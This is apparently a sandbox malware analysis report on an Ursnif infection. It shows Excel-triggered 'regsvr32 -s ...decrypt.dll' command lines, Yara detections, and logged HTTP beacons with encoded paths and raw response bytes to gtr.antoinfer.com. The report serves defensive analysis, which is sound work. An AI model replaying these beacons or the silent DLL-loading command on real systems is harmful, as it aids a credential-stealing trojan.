                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            5192.168.2.349760165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Jul 8, 2021 15:47:35.972897053 CEST7677OUTGET /MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLxdOtysJ/n0kMUo2t6MOWkWv9fh/vWxI1agPy/wQGFAQHZyVrGmWgCFodY/7FxYiI_2B53c0enExOR/GrTPqZ6XXPPo3SV3TEozm4/Exzy5YwFrUkYs/bQh_2FMD/0GOF4z17cCRm_2Fd6CEZwMn/XbmChIoDCR/BVkOjJKAuaNi81j2s/DAsZ7IX3Y_2F/9MNFRd8bZDE/rF3vDAxY3XVSH_/2BRf6xlnVaI7w67ANQeYN/HlP9zkWlJUqCL5u9/iWI0VgGL0n3Ke_2/BO2nUtcdX/UZ97 HTTP/1.1
                                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            Host: gtr.antoinfer.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jul 8, 2021 15:47:36.880944967 CEST7679INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Thu, 08 Jul 2021 13:47:36 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 92 83 50 10 45 3f 88 05 6e 4b 5c 82 3b ec 70 d7 e0 5f 3f 99 9a 75 0a e8 bc be f7 9c 0a e3 22 46 69 4a 89 0d bf 62 27 06 5f dc 34 68 5b b7 0f 81 0d 5d cc 80 e5 82 22 63 e1 ba e3 36 77 6c 8c 96 91 d7 61 a2 07 ea a8 43 79 2a 30 b0 b4 aa 83 50 87 a1 be b8 b2 96 35 fc a5 5e a8 65 97 05 6a 03 3f 3b a3 9c a0 b8 9b 23 79 82 6a 69 f2 e2 c1 c4 96 61 34 d0 04 31 db d6 56 ed cb de c5 3e 77 af 31 80 9a f3 e3 4e 9b ee 39 67 54 ba 17 82 aa 5b 94 fd cd 9a ed 1b 69 74 3d d7 85 4b e9 b8 21 df 46 fa 38 9d 5d ed 78 28 97 26 5c 50 5e d0 2e d1 ad 36 ba 60 2b 5e e7 83 a9 59 56 2e 61 06 4b 6d 91 3c 1b 71 f6 c5 da 09 9c ee 3b 5e bb 5c 1a ba 82 32 b9 6b c8 54 88 12 81 a5 e2 5d df 70 b3 09 0d d6 08 94 1d 83 3a 92 3e 0a ed f7 20 20 1f d7 c2 f2 5b 5b b6 e9 29 71 0e f1 d0 98 40 48 b7 ca ba c5 0c 47 75 57 70 94 09 24 38 50 61 ec b7 6f 9d aa 4f 84 8f ab 74 d0 83 6e b9 b0 7f b7 da 37 ac 8f 1e 73 69 36 ad 37 5b a9 d7 bb ef 0e 21 c8 3d 55 42 78 7b 1c 23 7e e4 62 86 b7 ba df fa 16 32 35 11 86 48 4a e6 cd a0 98 5d 07 a7 c8 da 8d 69 0a aa b7 6d a8 3a 8d a3 88 e6 6c 7b 69 4f a3 bb ff 60 b2 ad 9c 1a e3 12 bc 22 46 35 62 9c 54 06 14 cf 5c b3 62 17 5c 1e 2c 30 70 e3 83 12 73 69 83 d6 1c 9e 3d 4c f6 4b f4 78 c5 10 bc f9 d1 04 13 99 30 00 21 89 64 24 7f 5f 8d 7c e7 d4 c0 87 b9 f4 00 56 99 34 f9 05 36 2a 7e 2e 32 00 1d 97 c3 4d 5c a0 a4 d8 8d cd 8f 3f c1 2a 54 b6 23 1a e8 9f 62 3c ef e3 61 fa 27 fb dd e7 96 89 19 37 d6 58 e2 57 ca e4 7c 83 68 66 b5 a7 69 9d 27 9d 98 d8 d0 c8 84 98 e1 54 9a 48 5b 12 f6 ee ab 6e e1 9b 98 ed 34 19 2f b0 78 58 ab c2 70 b0 6c 80 bf ed 30 8d 4f 89 22 ee 74 83 38 66 a5 38 8e 5c 96 37 08 65 03 4d 5f a3 74 4d 7c ae c5 37 a7 7c 2e 4e 00 ea 98 c2 61 63 ff ac 83 86 c7 9b 0b a0 92 d9 1d e4 5e dc fe 70 64 6e e3 7f 88 de 23 6a 5c 51 6b 0b ab 0b 1e 1b a6 6e aa 95 33 8b e1 b3 75 0d f9 2b 10 2d 54 b3 1f da 4b 89 4a 60 22 59 ac e1 e9 ec 49 3e 88 2d 72 97 63 5f 41 dc b9 df f6 fb 3d dc e2 6c 6f 1d 56 10 98 77 6d eb 31 22 e7 03 03 2e 99 a1 e3 6f 16 4b 1d ec 57 05 63 8b fa 19 ed 11 2a b1 c4 7c 28 ae f0 95 5a 61 a5 bc ce 4f fd 61 c1 d4 df 00 5c 7b 11 2f 56 9f 4c ba ef 23 de c5 7e df e0 a0 9e 9b 0d a6 52 cb b2 d2 5d af 93 c1 ba 99 70 6a 49 e1 2e ac b9 52 98 c7 5c a0 a7 5e 54 87 62 a4 da 40 b7 8f 26 0b 07 6e 9b 14 07 86 ce 01 4e 1f 0b 61 83 d3 f0 ae 29 42 33 28 0c c2 a8 7d 90 d2 33 55 52 84 4a d6 b7 d7 2a 27 e5 55 f3 b5 e7 24 1d 8e 00 3b 95 e4 8e 5d 87 c6 70 41 bd 8f f7 7b 32 7e 9c c2 42 1e 39 29 f0 7f 4b 4b ef cf b7 77 f9 2b 23 b9 49 01 f6 23 f0 bc af 8e 7e 58 32 af be 5f 44 2f b8 bc 08 47 ad e0 1d 04 db 48 e5 db 48 16 ba d5 46 a7 5a d7 2d 09 24 87 ea a7 d2 32 6a 36 0b 87 b3 aa 80 e3 c5 6d 10 e1 56 f7 10 9e c6 5d c9 9d 71 dd 87 0f f0 9a 78 98 f9 c3 de 2a 02 be b1 51 2f f2 6f df 52 13 c7 41 4e dd ce c1 93 9e 8d cd 16 13 d5 2b b3 4a 27 d0 8d e4 a0 8c 75 e7 09 ee 89 17 98 c9 46 e7 c6 6d 95 92 90 a7 4f 6b 8d 06 cd b6 9d 2f ea aa bf 64 8c 37 98 4f 2a 34 f5 2e 78 4d 43 46 b1 33 f6 c1 36 ef 33 e9 df 44 9e cb eb 7a ce 67 80 f6 59 90 fa 83 9c bc 79 b6 3f 17 63 60 ea 8e 94 df 7a 9d ee 8a 34 30 ad f2 73 a0 02 cd 59 f1 c3 78 61 ca 33 29 65 cd
                                                                                                                                                            Data Ascii: 2000PE?nK\;p_?u"FiJb'_4h[]"c6wlaCy*0P5^ej?;#yjia41V>w1N9gT[it=K!F8]x(&\P^.6`+^YV.aKm<q;^\2kT]p:> [[)q@HGuWp$8PaoOtn7si67[!=UBx{#~b25HJ]im:l{iO`"F5bT\b\,0psi=LKx0!d$_|V46*~.2M\?*T#b<a'7XW|hfi'TH[n4/xXpl0O"t8f8\7eM_tM|7|.Nac^pdn#j\Qkn3u+-TKJ`"YI>-rc_A=loVwm1".oKWc*|(ZaOa\{/VL#~R]pjI.R\^Tb@&nNa)B3(}3URJ*'U$;]pA{2~B9)KKw+#I#~X2_D/GHHFZ-$2j6mV]qx*Q/oRAN+J'uFmOk/d7O*4.xMCF363DzgYy?c`z40sYxa3)e


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            6192.168.2.349762165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Jul 8, 2021 15:47:37.855365038 CEST7824OUTGET /IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjgFXMm7GK3zI8vuZf8x/2APU8PDwtmpAr/ANYuz5rb/u_2Ba0GWu8ipmpUp8uWalIe/b1DgDagPuJ/QMf4e8CmCgrJh1KOA/BEoe0WcWQ2Nu/avlRE03_2BA/ikzAyiPbN_2BHy/_2BYBLI5BgaFwR91PIKzH/SJ1rXSKpXvP3w4_2/BgNlAxmgSpCbzA3/rA6BVOnt_2Fs0ge7Ub/mZV_2ByZe/27QR_2F_2BkAwlW65Zcm/dBBVfaC3K9GAjFa76dp/yXioP6kRbgfKWsmcnd8JPP/othn HTTP/1.1
                                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            Host: gtr.antoinfer.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jul 8, 2021 15:47:38.766030073 CEST7942INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Thu, 08 Jul 2021 13:47:38 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 37 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 95 45 92 84 50 10 44 0f c4 02 6b 6c 09 34 4e e3 7c 64 87 bb 3b a7 9f b9 40 46 54 ca ab 94 3e 2d a2 d1 1c fb 17 3e 87 ab e7 47 32 57 b8 78 9a a5 c4 50 1c 0e 37 16 3b 54 e2 2e d7 f6 2d 9c ab 40 fa 6e d2 9f 06 b1 f5 39 21 71 85 f2 70 dc b0 c6 d9 1c dd 80 c2 eb 5c 2f 49 25 da 32 e6 1c a2 ab 3a aa 7e 53 87 a8 82 b9 ca 50 63 b3 34 c0 34 9c e0 c6 42 fc 72 6f 9e 13 e7 ea 3a 91 e3 97 a3 82 8b de fc 6c 54 45 9e c3 c3 4e 30 b2 32 15 83 23 9e 01 75 c8 b6 98 0c 05 6f 69 27 92 59 9e cc 49 47 bf 05 bf af dc 85 d3 4a 93 be a8 88 1e 35 e4 99 ac 49 64 33 53 9b 2a ed bd 6a d3 a2 65 68 13 58 53 90 35 83 c7 0b b2 6c 5e eb 0f 88 51 a8 ea 04 39 6b dc 74 1e 5e 2a 78 cf 8d ab d5 bd c8 45 28 2c 57 17 aa bc 31 ce 44 74 59 6c 71 f0 de 38 90 af 10 cb 54 a1 8c 0e 1d a6 33 4a 41 8a fa 96 e1 24 a3 e1 7a e1 d1 d7 91 95 e0 95 04 c3 b5 2d 79 47 2d d5 57 f3 4f 68 61 59 da ee cf ad b3 23 f4 31 d2 45 22 cb 27 ba 76 96 12 d2 9d 10 6d 90 c0 10 f3 29 f3 6b c8 f0 f9 3b 96 5f ff 90 b7 4d df f8 78 51 68 86 68 44 11 58 3a d7 1f 24 8b af 13 f3 00 42 f1 ec 9d 0c b6 5d a2 cd 82 9a 52 29 06 76 8a 04 fc 3a 52 0b df 33 ba af 79 b2 a9 6e eb 03 13 ab 0e 3e 7d 8d 7d 84 12 21 a3 15 0c 5f e8 2c 94 ee 45 73 61 6e 9d 43 02 20 f1 82 62 08 1a 30 3e 95 94 1c eb 9b e2 bf f5 a5 40 b8 22 77 75 b0 c6 53 4d 2a 24 74 63 cd d3 4c 88 01 bc ef 5d b4 56 fb 75 94 59 58 25 06 9c e0 1c a8 e1 32 9e 70 49 5f ee fa ee ca 6a 73 82 03 62 fb f7 45 4f e5 b3 67 5a ab 29 fb 83 c9 88 06 2e eb 94 84 46 66 2c fc 30 98 58 b2 6b 95 12 94 c0 5f 1c 79 73 f4 14 7d f9 04 64 87 00 5b b1 81 b0 fe 22 0a aa 9c f0 e2 0f 4f bb 27 4d 94 ff e6 b8 ee 1e b7 4e e3 36 93 f4 e2 55 f6 86 58 12 67 2b 84 72 d8 7d 27 2d 04 6f d8 0c 90 de 83 f7 b3 de ba 9c 64 11 8d 40 31 ec 9c 34 65 1b 44 41 fe ef 80 f9 49 5f 4d 06 f2 b5 ff 74 2b a3 c1 b6 d8 88 05 09 45 ba a4 b5 31 96 0b 98 98 36 fb de fb 2f 8f 8f d2 a9 0c 3f 49 d2 52 68 d4 5f b4 eb 2f 1c bb bf 7e e0 f9 6a d7 b7 cc e3 f6 8e 5e c5 48 8b 39 47 52 7e 3f aa 1f d7 4a 72 8c ab d8 91 6d 57 5e ff f0 c9 0a 2d d5 9a 76 83 20 31 c9 ec cc 66 e4 cd a9 25 94 57 6c 9d 14 ba 36 3e 24 bc c2 03 5e ab 5d 43 ad 27 68 cb 24 37 4d 33 a2 e1 71 53 b6 86 50 2c b5 55 9a ad 7c 2e 51 f2 08 b9 ae 6a d9 9e 72 07 77 77 bf 86 3c 5f 2a 3d 93 e2 e1 79 d8 c4 ca 04 de 34 13 dd c2 76 26 50 69 65 5d 03 6c d9 18 da a4 1c 1c 3f bd f9 5b 33 49 4e 66 2a c0 b7 22 d2 8b c0 fb 8e 6c 5f 22 5f 6d 6d 23 99 d6 f8 9f 4f 70 f5 20 ba 6b 91 4c ad 5b cb 1f 3e 77 da e8 67 1f 6f 36 d7 58 09 80 76 14 ba c8 f8 b7 8b ab be 55 58 8c ab 10 d1 66 f0 fe af 9d 98 fb b8 7c 38 a6 1a 53 a3 ff 47 fd 2f b3 4b b3 cc d9 e1 11 19 c9 14 4b da 2a 20 7a 0c 9f 6d b5 5d 3c 98 62 46 99 99 99 fb 95 e8 63 00 4b ce 81 26 0a 2e 2c 2c 35 a2 c8 b8 96 fa 21 09 4d 61 bd 4d ab 7c a1 2c 5c c5 32 3b 24 05 71 5f 06 1f 67 a5 17 cc af a7 98 e7 cd fa da f2 e9 6c c7 c3 ef a2 e0 e2 af e6 fc 6a 77 36 2b 69 f7 01 63 41 e7 ab 1b b3 7b 7e a8 e8 0a ab b3 dd 5c d3 38 74 b3 41 ac e8 8d 49 6d b0 9b 0e 9d 6f 1b c2 d4 44 0e a5 1b 6b a2 e3 a4 e7 2b 0b d3 c1 a5 31 77 2b 42 66 ef 98 f9 0b 33 c8 b6 36 91 a7 ea aa 7b 94 96 88 74 49 c3 12 99 50 ec cb e8 6e 28 59 65 b9 ad
                                                                                                                                                            Data Ascii: 76fEPDkl4N|d;@FT>->G2WxP7;T.-@n9!qp\/I%2:~SPc44Bro:lTEN02#uoi'YIGJ5Id3S*jehXS5l^Q9kt^*xE(,W1DtYlq8T3JA$z-yG-WOhaY#1E"'vm)k;_MxQhhDX:$B]R)v:R3yn>}}!_,EsanC b0>@"wuSM*$tcL]VuYX%2pI_jsbEOgZ).Ff,0Xk_ys}d["O'MN6UXg+r}'-od@14eDAI_Mt+E16/?IRh_/~j^H9GR~?JrmW^-v 1f%Wl6>$^]C'h$7M3qSP,U|.Qjrww<_*=y4v&Pie]l?[3INf*"l_"_mm#Op kL[>wgo6XvUXf|8SG/KK* zm]<bFcK&.,,5!MaM|,\2;$q_gljw6+icA{~\8tAImoDk+1w+Bf36{tIPn(Ye


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            7192.168.2.349761165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Jul 8, 2021 15:47:39.574058056 CEST7943OUTGET /h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIHQG/CB4JNANcQf7aA7/T_2FdtzxTEW5qEGgXi5de/wQDU_2FVQ9AqPhgZ/QBiqWLaZem_2BhU/Ub_2Bbrgr7V1ABDC_2/FRiGY94s4/Mw6BG5UCBUeOPfAvsqhw/LTDXh6l0kPjcKC2fY3f/eXzxQUf3im0jBAcOxzjmlM/t_2BlYZFFpOnU/rPHW4IFe/pXsS9omB7zF_2B_2BEp_2BV/Ya9nAT6p4X/2ixawH6C4M4LLI7hR/_2BGNe0TQDy_/2FBKn745niy/_2BRADxlO6wxP1/zz_2BWqAzRaI/gWg HTTP/1.1
                                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            Host: gtr.antoinfer.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jul 8, 2021 15:47:40.508263111 CEST7945INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Thu, 08 Jul 2021 13:47:40 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 37 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 95 45 92 84 50 10 44 0f c4 02 6b 6c 09 34 4e e3 7c 64 87 bb 3b a7 9f b9 40 46 54 ca ab 94 3e 2d a2 d1 1c fb 17 3e 87 ab e7 47 32 57 b8 78 9a a5 c4 50 1c 0e 37 16 3b 54 e2 2e d7 f6 2d 9c ab 40 fa 6e d2 9f 06 b1 f5 39 21 71 85 f2 70 dc b0 c6 d9 1c dd 80 c2 eb 5c 2f 49 25 da 32 e6 1c a2 ab 3a aa 7e 53 87 a8 82 b9 ca 50 63 b3 34 c0 34 9c e0 c6 42 fc 72 6f 9e 13 e7 ea 3a 91 e3 97 a3 82 8b de fc 6c 54 45 9e c3 c3 4e 30 b2 32 15 83 23 9e 01 75 c8 b6 98 0c 05 6f 69 27 92 59 9e cc 49 47 bf 05 bf af dc 85 d3 4a 93 be a8 88 1e 35 e4 99 ac 49 64 33 53 9b 2a ed bd 6a d3 a2 65 68 13 58 53 90 35 83 c7 0b b2 6c 5e eb 0f 88 51 a8 ea 04 39 6b dc 74 1e 5e 2a 78 cf 8d ab d5 bd c8 45 28 2c 57 17 aa bc 31 ce 44 74 59 6c 71 f0 de 38 90 af 10 cb 54 a1 8c 0e 1d a6 33 4a 41 8a fa 96 e1 24 a3 e1 7a e1 d1 d7 91 95 e0 95 04 c3 b5 2d 79 47 2d d5 57 f3 4f 68 61 59 da ee cf ad b3 23 f4 31 d2 45 22 cb 27 ba 76 96 12 d2 9d 10 6d 90 c0 10 f3 29 f3 6b c8 f0 f9 3b 96 5f ff 90 b7 4d df f8 78 51 68 86 68 44 11 58 3a d7 1f 24 8b af 13 f3 00 42 f1 ec 9d 0c b6 5d a2 cd 82 9a 52 29 06 76 8a 04 fc 3a 52 0b df 33 ba af 79 b2 a9 6e eb 03 13 ab 0e 3e 7d 8d 7d 84 12 21 a3 15 0c 5f e8 2c 94 ee 45 73 61 6e 9d 43 02 20 f1 82 62 08 1a 30 3e 95 94 1c eb 9b e2 bf f5 a5 40 b8 22 77 75 b0 c6 53 4d 2a 24 74 63 cd d3 4c 88 01 bc ef 5d b4 56 fb 75 94 59 58 25 06 9c e0 1c a8 e1 32 9e 70 49 5f ee fa ee ca 6a 73 82 03 62 fb f7 45 4f e5 b3 67 5a ab 29 fb 83 c9 88 06 2e eb 94 84 46 66 2c fc 30 98 58 b2 6b 95 12 94 c0 5f 1c 79 73 f4 14 7d f9 04 64 87 00 5b b1 81 b0 fe 22 0a aa 9c f0 e2 0f 4f bb 27 4d 94 ff e6 b8 ee 1e b7 4e e3 36 93 f4 e2 55 f6 86 58 12 67 2b 84 72 d8 7d 27 2d 04 6f d8 0c 90 de 83 f7 b3 de ba 9c 64 11 8d 40 31 ec 9c 34 65 1b 44 41 fe ef 80 f9 49 5f 4d 06 f2 b5 ff 74 2b a3 c1 b6 d8 88 05 09 45 ba a4 b5 31 96 0b 98 98 36 fb de fb 2f 8f 8f d2 a9 0c 3f 49 d2 52 68 d4 5f b4 eb 2f 1c bb bf 7e e0 f9 6a d7 b7 cc e3 f6 8e 5e c5 48 8b 39 47 52 7e 3f aa 1f d7 4a 72 8c ab d8 91 6d 57 5e ff f0 c9 0a 2d d5 9a 76 83 20 31 c9 ec cc 66 e4 cd a9 25 94 57 6c 9d 14 ba 36 3e 24 bc c2 03 5e ab 5d 43 ad 27 68 cb 24 37 4d 33 a2 e1 71 53 b6 86 50 2c b5 55 9a ad 7c 2e 51 f2 08 b9 ae 6a d9 9e 72 07 77 77 bf 86 3c 5f 2a 3d 93 e2 e1 79 d8 c4 ca 04 de 34 13 dd c2 76 26 50 69 65 5d 03 6c d9 18 da a4 1c 1c 3f bd f9 5b 33 49 4e 66 2a c0 b7 22 d2 8b c0 fb 8e 6c 5f 22 5f 6d 6d 23 99 d6 f8 9f 4f 70 f5 20 ba 6b 91 4c ad 5b cb 1f 3e 77 da e8 67 1f 6f 36 d7 58 09 80 76 14 ba c8 f8 b7 8b ab be 55 58 8c ab 10 d1 66 f0 fe af 9d 98 fb b8 7c 38 a6 1a 53 a3 ff 47 fd 2f b3 4b b3 cc d9 e1 11 19 c9 14 4b da 2a 20 7a 0c 9f 6d b5 5d 3c 98 62 46 99 99 99 fb 95 e8 63 00 4b ce 81 26 0a 2e 2c 2c 35 a2 c8 b8 96 fa 21 09 4d 61 bd 4d ab 7c a1 2c 5c c5 32 3b 24 05 71 5f 06 1f 67 a5 17 cc af a7 98 e7 cd fa da f2 e9 6c c7 c3 ef a2 e0 e2 af e6 fc 6a 77 36 2b 69 f7 01 63 41 e7 ab 1b b3 7b 7e a8 e8 0a ab b3 dd 5c d3 38 74 b3 41 ac e8 8d 49 6d b0 9b 0e 9d 6f 1b c2 d4 44 0e a5 1b 6b a2 e3 a4 e7 2b 0b d3 c1 a5 31 77 2b 42 66 ef 98 f9 0b 33 c8 b6 36 91 a7 ea aa 7b 94 96 88 74 49 c3 12 99 50 ec cb e8 6e 28 59 65 b9 ad
                                                                                                                                                            Data Ascii: 76fEPDkl4N|d;@FT>->G2WxP7;T.-@n9!qp\/I%2:~SPc44Bro:lTEN02#uoi'YIGJ5Id3S*jehXS5l^Q9kt^*xE(,W1DtYlq8T3JA$z-yG-WOhaY#1E"'vm)k;_MxQhhDX:$B]R)v:R3yn>}}!_,EsanC b0>@"wuSM*$tcL]VuYX%2pI_jsbEOgZ).Ff,0Xk_ys}d["O'MN6UXg+r}'-od@14eDAI_Mt+E16/?IRh_/~j^H9GR~?JrmW^-v 1f%Wl6>$^]C'h$7M3qSP,U|.Qjrww<_*=y4v&Pie]l?[3INf*"l_"_mm#Op kL[>wgo6XvUXf|8SG/KK* zm]<bFcK&.,,5!MaM|,\2;$q_gljw6+icA{~\8tAImoDk+1w+Bf36{tIPn(Ye


                                                                                                                                                            HTTPS Packets

                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                            Jul 8, 2021 15:45:12.935718060 CEST162.241.253.78443192.168.2.349725CN=www.free.mynowministries.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Jun 15 19:07:00 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Mon Sep 13 19:06:59 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                            CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                            CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                                                                                                            Code Manipulations

                                                                                                                                                            Statistics

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Start time:15:45:08
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                            Imagebase:0x3f0000
                                                                                                                                                            File size:27110184 bytes
                                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:15:45:13
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:regsvr32 -s C:\Users\Public\Documents\decrypt.dll
                                                                                                                                                            Imagebase:0xfc0000
                                                                                                                                                            File size:20992 bytes
                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Start time:15:46:33
                                                                                                                                                            Start date:08/07/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:regsvr32 -s C:\Users\Public\Documents\decrypt.dll
                                                                                                                                                            Imagebase:0xfc0000
                                                                                                                                                            File size:20992 bytes
                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, Author: Joe Security
